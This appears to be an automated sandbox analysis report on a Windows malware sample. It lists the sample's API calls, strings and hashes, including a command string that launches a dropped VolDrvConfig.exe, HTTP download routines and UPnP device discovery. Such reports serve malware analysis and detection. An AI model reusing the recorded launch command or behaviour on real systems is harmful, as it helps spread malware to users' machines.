                                              • Instruction ID: 26b7d68298067a6ce37e9ddfddb25a36523320ae21639d5819629e884720d218
                                              • Instruction Fuzzy Hash: 47212C71940308BBEB10ABA0DC49FEE7B78EB04711F108439F606BA1D0DBB995948F69

                                              Control-flow Graph

                                              APIs
                                              • memset.NTDLL ref: 0040E178
                                              • InternetCrackUrlA.WININET(0040DC29,00000000,10000000,0000003C), ref: 0040E1C8
                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E1D8
                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E211
                                              • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E247
                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E26F
                                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E2B8
                                              • memcpy.NTDLL(00000000,?,00000000), ref: 0040E30A
                                              • InternetCloseHandle.WININET(00000000), ref: 0040E347
                                              • InternetCloseHandle.WININET(00000000), ref: 0040E354
                                              • InternetCloseHandle.WININET(00000000), ref: 0040E361
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
                                              • String ID: <$GET
                                              • API String ID: 1205665004-427699995
                                              • Opcode ID: 67af59116773a7797ed2b96ff4475bc1c7b496ee21b5589c00d2aeb3a4039631
                                              • Instruction ID: 0e0ad4ad31c216dc2eff2ccec99c89ab6a28dd79d12b38366d41975b782ec3ac
                                              • Opcode Fuzzy Hash: 67af59116773a7797ed2b96ff4475bc1c7b496ee21b5589c00d2aeb3a4039631
                                              • Instruction Fuzzy Hash: 6E511BB5901228ABDB36CB50CC55BE9B7BCAB44705F0444E9A60DAA2C0D7B96BC4CF54
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040ED82
                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040EDA3
                                              • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040EDC2
                                              • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040EDDB
                                              • memcmp.NTDLL ref: 0040EE6D
                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040EE90
                                              • CloseHandle.KERNEL32(00000000), ref: 0040EE9A
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040EEA4
                                              • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EEC3
                                              • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040EEE8
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040EEF2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                              • String ID:
                                              • API String ID: 3902698870-0
                                              • Opcode ID: 7ad1fe91360db5ea26f22c98dcdf1cd4795f1c803dd98443715d61a40f1b6e9d
                                              • Instruction ID: 4e6ec57638d856f2454fe90bbc3b1fbf5740e030230db4960ae301055fb20e21
                                              • Opcode Fuzzy Hash: 7ad1fe91360db5ea26f22c98dcdf1cd4795f1c803dd98443715d61a40f1b6e9d
                                              • Instruction Fuzzy Hash: 34515FB4E40208FBDB14DFA4CC49BDFB774AB48704F108569E615B72C0D7B9AA45CB98
                                              APIs
                                              • GetCurrentThread.KERNEL32 ref: 0040D866
                                              • GetThreadPriority.KERNEL32(00000000,?,?,?,0040805F,?,000000FF), ref: 0040D86D
                                              • GetCurrentThread.KERNEL32 ref: 0040D878
                                              • SetThreadPriority.KERNEL32(00000000,?,?,?,0040805F,?,000000FF), ref: 0040D87F
                                              • InterlockedExchangeAdd.KERNEL32(0040805F,00000000), ref: 0040D8A2
                                              • EnterCriticalSection.KERNEL32(000000FB), ref: 0040D8D7
                                              • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040D922
                                              • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040D93E
                                              • Sleep.KERNEL32(00000001), ref: 0040D96E
                                              • GetCurrentThread.KERNEL32 ref: 0040D97D
                                              • SetThreadPriority.KERNEL32(00000000,?,?,?,0040805F), ref: 0040D984
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                              • String ID:
                                              • API String ID: 3862671961-0
                                              • Opcode ID: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
                                              • Instruction ID: d6bd3df3806ede59070add2f0d7a1f8bc277f5a62d9d5dceae4a540d753efef8
                                              • Opcode Fuzzy Hash: a6592383c0f5364e70b0f454a5c96517dd5f3d581be9e9b029ccc77ff023b2d7
                                              • Instruction Fuzzy Hash: 80413CB4E00209EBDB14DFE4D848BAEBB75EF44305F10C16AE911A7390D7789A85CF59
                                              APIs
                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
                                              • InterlockedDecrement.KERNEL32(?), ref: 00401DB0
                                              • InterlockedDecrement.KERNEL32(?), ref: 00401DC3
                                              • InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
                                              • InterlockedDecrement.KERNEL32(?), ref: 00401E5B
                                              • InterlockedDecrement.KERNEL32(?), ref: 00401EF6
                                              • setsockopt.WS2_32 ref: 00401F2C
                                              • closesocket.WS2_32(?), ref: 00401F39
                                                • Part of subcall function 0040DA30: NtQuerySystemTime.NTDLL(0040B945), ref: 0040DA3A
                                                • Part of subcall function 0040DA30: RtlTimeToSecondsSince1980.NTDLL(0040B945,?), ref: 0040DA48
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                              • String ID:
                                              • API String ID: 671207744-0
                                              • Opcode ID: ae0f208c7e5ebe03a9eed9973f4c7fb273d4e64238f42e24874dbd14c375a4e9
                                              • Instruction ID: 8c1e587a25cfc232de2ab0883eb36e20e47ed0b1207a5ae34e006e610dd4584e
                                              • Opcode Fuzzy Hash: ae0f208c7e5ebe03a9eed9973f4c7fb273d4e64238f42e24874dbd14c375a4e9
                                              • Instruction Fuzzy Hash: F2519F75608B02ABC704DF39D488B9BFBE4BF88314F44872EF89983360D775A5458B96
                                              APIs
                                              • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DE6E
                                              • Sleep.KERNEL32(000003E8), ref: 0040DE7E
                                              • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DE9B
                                              • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DEB1
                                              • StrChrA.SHLWAPI(?,0000000D), ref: 0040DEDE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleeprecvfrom
                                              • String ID: HTTP/1.1 200 OK$LOCATION:
                                              • API String ID: 668330359-3973262388
                                              • Opcode ID: e60f8651836f9e105a51a8b773690953c72053fd89719a78497b2faf5898f70f
                                              • Instruction ID: cf4c7c589cb5a2b5626e628c2cbe2bc4730fcdb76fc9a6090f7a4287b0899cde
                                              • Opcode Fuzzy Hash: e60f8651836f9e105a51a8b773690953c72053fd89719a78497b2faf5898f70f
                                              • Instruction Fuzzy Hash: C92142B0944218ABDB20CB64DC49BE97774AB14308F1085E9E7197B2C0D7B99ACACF5C
                                              APIs
                                              • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040EFD7
                                              • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EFF6
                                              • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040F01F
                                              • InternetCloseHandle.WININET(00000000), ref: 0040F048
                                              • InternetCloseHandle.WININET(00000000), ref: 0040F052
                                              • Sleep.KERNEL32(000003E8), ref: 0040F05D
                                              Strings
                                              • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040EFD2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                              • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                              • API String ID: 2743515581-2272513262
                                              • Opcode ID: ecc82b78ed0739231bcfbdfeb973cd3a1bf52cd0352c481dc6c1b38e2f15aa13
                                              • Instruction ID: b5bc459e60af10a5ecd3bce89b92fe6334010ad2bd78cd38f87cd536e4e3c5ce
                                              • Opcode Fuzzy Hash: ecc82b78ed0739231bcfbdfeb973cd3a1bf52cd0352c481dc6c1b38e2f15aa13
                                              • Instruction Fuzzy Hash: 6821FC74A40208FBDB20DF94CC49FDEB775AB44705F1085A5FA11AB2C1C7B96A44CB59
                                              APIs
                                              • InitializeCriticalSection.KERNEL32(00417F40,?,?,?,?,?,?,00407FE3), ref: 0040B85B
                                              • CreateFileW.KERNEL32(00417D28,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B8AD
                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B8CE
                                              • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040B8ED
                                              • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040B902
                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040B968
                                              • CloseHandle.KERNEL32(00000000), ref: 0040B972
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040B97C
                                                • Part of subcall function 0040DA30: NtQuerySystemTime.NTDLL(0040B945), ref: 0040DA3A
                                                • Part of subcall function 0040DA30: RtlTimeToSecondsSince1980.NTDLL(0040B945,?), ref: 0040DA48
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                              • String ID:
                                              • API String ID: 439099756-0
                                              • Opcode ID: 929abe7a9095254e26be5e4d35e4c48d0475e135154847a51b6584f6b16baab1
                                              • Instruction ID: 20bf7a335d7b83d19979346108b4db2f5a5138f5ba8950715db26485b9768e75
                                              • Opcode Fuzzy Hash: 929abe7a9095254e26be5e4d35e4c48d0475e135154847a51b6584f6b16baab1
                                              • Instruction Fuzzy Hash: 84413AB4E40308ABDB10DFA4CC4AFAEB774EB04704F208569E611BA2D1C7B96641CB9D
                                              APIs
                                              • InitializeCriticalSection.KERNEL32(004174D8,?,?,?,?,?,00407FAD), ref: 00405B6B
                                              • CreateFileW.KERNEL32(00417708,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00407FAD), ref: 00405B85
                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405BA6
                                              • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405BC5
                                              • GetFileSize.KERNEL32(000000FF,00000000), ref: 00405BDE
                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 00405C6B
                                              • CloseHandle.KERNEL32(00000000), ref: 00405C75
                                              • CloseHandle.KERNEL32(000000FF), ref: 00405C7F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                              • String ID:
                                              • API String ID: 3956458805-0
                                              • Opcode ID: 35b4c2d6947d5e03e03b6242c6a307a00e78fae8ded93bcc40d6e7bbcaf7c30e
                                              • Instruction ID: 3caee3762cbdbcce4f49fb41099d7db393733e6e5b5fc44a0020794708857aa0
                                              • Opcode Fuzzy Hash: 35b4c2d6947d5e03e03b6242c6a307a00e78fae8ded93bcc40d6e7bbcaf7c30e
                                              • Instruction Fuzzy Hash: 51313D74A40308EBEB10DBA4CC4ABAFB774EB44704F208569E601772D0D7B96A81CF99
                                              APIs
                                              • EnterCriticalSection.KERNEL32(004174D8,00000000,0040BE82,006A0266,?,0040BE9E,00000000,0040D17C,?), ref: 0040600F
                                              • memcpy.NTDLL(?,00000000,00000100), ref: 004060A1
                                              • CreateFileW.KERNEL32(00417708,40000000,00000000,00000000,00000002,00000002,00000000), ref: 004061C5
                                              • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00406227
                                              • FlushFileBuffers.KERNEL32(000000FF), ref: 00406233
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040623D
                                              • LeaveCriticalSection.KERNEL32(004174D8,?,?,?,?,?,?,0040BE9E,00000000,0040D17C,?), ref: 00406248
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
                                              • String ID:
                                              • API String ID: 1457358591-0
                                              • Opcode ID: 2b9af9a80e0350e1b964868311a4eed9a9ef636119a8ca78730ff9e844c2d842
                                              • Instruction ID: d2a8f2c597d4f808d2c136561af7b6c80c21d69a530c7dbbc8373d1e9f004416
                                              • Opcode Fuzzy Hash: 2b9af9a80e0350e1b964868311a4eed9a9ef636119a8ca78730ff9e844c2d842
                                              • Instruction Fuzzy Hash: 6071E0B4E042099BCB04CF98D981FEFBBB1BB48304F14816DE505BB382D779A951CBA5
                                              APIs
                                              • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E72C
                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E77B
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E78F
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E7A7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeStringlstrcmpi
                                              • String ID: service$serviceType
                                              • API String ID: 1602765415-3667235276
                                              • Opcode ID: 2bb872dba71c4b18fb63231bfcc4c9cffbe7778cfe88db31ae78f26eb240510d
                                              • Instruction ID: 498a00270a4ac3f3e732f182914c0c13a71c1caacf2de73c52121c1bdff13e9d
                                              • Opcode Fuzzy Hash: 2bb872dba71c4b18fb63231bfcc4c9cffbe7778cfe88db31ae78f26eb240510d
                                              • Instruction Fuzzy Hash: D5412E74A0020AEFDB04DF95C884FAFB7B9BF48304F108969E515A7390D778AE85CB95
                                              APIs
                                              • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E88C
                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E8DB
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E8EF
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E907
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeStringlstrcmpi
                                              • String ID: device$deviceType
                                              • API String ID: 1602765415-3511266565
                                              • Opcode ID: fe57ae6d098728694eea3c4084fa761a4bbb21d2a922279ce8156623f7b4a2cf
                                              • Instruction ID: f37cc5fa491f806f20af1ba12fe7b13e6bb3fdd54c67fa744f8c06207b50935d
                                              • Opcode Fuzzy Hash: fe57ae6d098728694eea3c4084fa761a4bbb21d2a922279ce8156623f7b4a2cf
                                              • Instruction Fuzzy Hash: D1412DB5A0020ADFCB14DF99C884BAFB7B9BF48304F108569E515B7390D778AE85CB94
                                              APIs
                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
                                              • LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1815270324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1815258217.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815297975.0000000000414000.00000008.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1815309561.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalSection$EnterLeave
                                              • String ID:
                                              • API String ID: 3168844106-0
                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 0040640B
                                              • CoCreateInstance.OLE32(00412A48,00000000,00000001,00412A28,?), ref: 00406423
                                              • wsprintfW.USER32 ref: 00406456
                                              Strings
                                              • API ID: CreateInitializeInstancewsprintf
                                              • String ID: %comspec%$/c start %s & start %s\VolDrvConfig.exe$Gh@
                                              • API String ID: 2038452267-1238916929
                                              APIs
                                              • lstrcmpiW.KERNEL32(00000000,device), ref: 0040E88C
                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E8DB
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E8EF
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E907
                                              Strings
                                              • API ID: FreeStringlstrcmpi
                                              • String ID: device$deviceType
                                              • API String ID: 1602765415-3511266565
                                              APIs
                                              • lstrcmpiW.KERNEL32(00000000,service), ref: 0040E72C
                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E77B
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E78F
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040E7A7
                                              Strings
                                              • API ID: FreeStringlstrcmpi
                                              • String ID: service$serviceType
                                              • API String ID: 1602765415-3667235276
                                              APIs
                                              Strings
                                              • API ID: Sleep$CacheDeleteEntrywsprintf
                                              • String ID: %s%s
                                              • API String ID: 1447977647-3252725368
                                              APIs
                                              • GetLogicalDrives.KERNEL32 ref: 00406346
                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
                                              • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
                                              • RegCloseKey.ADVAPI32(?), ref: 004063DE
                                              Strings
                                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00406387
                                              • NoDrives, xrefs: 004063B8
                                              • API ID: CloseDrivesLogicalOpenQueryValue
                                              • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                              • API String ID: 2666887985-3471754645
                                              APIs
                                              • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D714
                                                • Part of subcall function 0040D7E0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D820
                                                • Part of subcall function 0040D7E0: CloseHandle.KERNEL32(?), ref: 0040D839
                                              • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D76F
                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D7AC
                                              • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D7B7
                                              • DuplicateHandle.KERNEL32(00000000), ref: 0040D7BE
                                              • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D7D2
                                              • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                              • String ID:
                                              • API String ID: 2251373460-0
                                              APIs
                                              • API ID: _allshl_aullshr
                                              • String ID:
                                              • API String ID: 673498613-0
                                              APIs
                                              • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                              • htons.WS2_32(?), ref: 00401281
                                              • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                              Strings
                                              • API ID: ExchangeInterlockedhtonsmemcpysendto
                                              • String ID: pdu
                                              • API String ID: 2164660128-2320407122
                                              APIs
                                              • CoInitializeEx.OLE32(00000000,00000002,?,?,00407FB7), ref: 00406F78
                                              • SysAllocString.OLEAUT32(C:\Users\user\Desktop\file.exe), ref: 00406F83
                                              • CoUninitialize.OLE32 ref: 00406FA8
                                                • Part of subcall function 00406FC0: SysFreeString.OLEAUT32(00000000), ref: 004071D8
                                              • SysFreeString.OLEAUT32(00000000), ref: 00406FA2
                                              Strings
                                              • C:\Users\user\Desktop\file.exe, xrefs: 00406F7E
                                              • API ID: String$Free$AllocInitializeUninitialize
                                              • String ID: C:\Users\user\Desktop\file.exe
                                              • API String ID: 459949847-1957095476
                                              APIs
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
                                              • InterlockedDecrement.KERNEL32(?), ref: 004018B1
                                                • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                              • API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
                                              • String ID:
                                              • API String ID: 3966618661-0
                                              APIs
                                              • CreateFileW.KERNEL32(00417D28,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040B1A8
                                              • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040B1C9
                                              • FlushFileBuffers.KERNEL32(000000FF), ref: 0040B1D3
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040B1DD
                                              • InterlockedExchange.KERNEL32(00416900,0000003D), ref: 0040B1EA
                                              • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                              • String ID:
                                              • API String ID: 442028454-0
                                              APIs
                                              • API ID: _allshl
                                              • String ID:
                                              • API String ID: 435966717-0
                                              APIs
                                              • SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 00401346
                                              • WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 00401352
                                              • CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 0040135C
                                                • Part of subcall function 0040A740: HeapFree.KERNEL32(00000000,00000000,00402612,?,00402612,?), ref: 0040A79B
                                              Strings
                                              • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                              • String ID: pdu
                                              • API String ID: 309973729-2320407122
                                              • Opcode ID: 6b6ea7fc194c066d272c2ceb60e6e8d4b7d6d70c2bd26222ba97c1c57b6b1a03
                                              • Instruction ID: d282b52b3110f6f030980250f42d45aa65f4851f6724e2164e4de9b2c85264d0
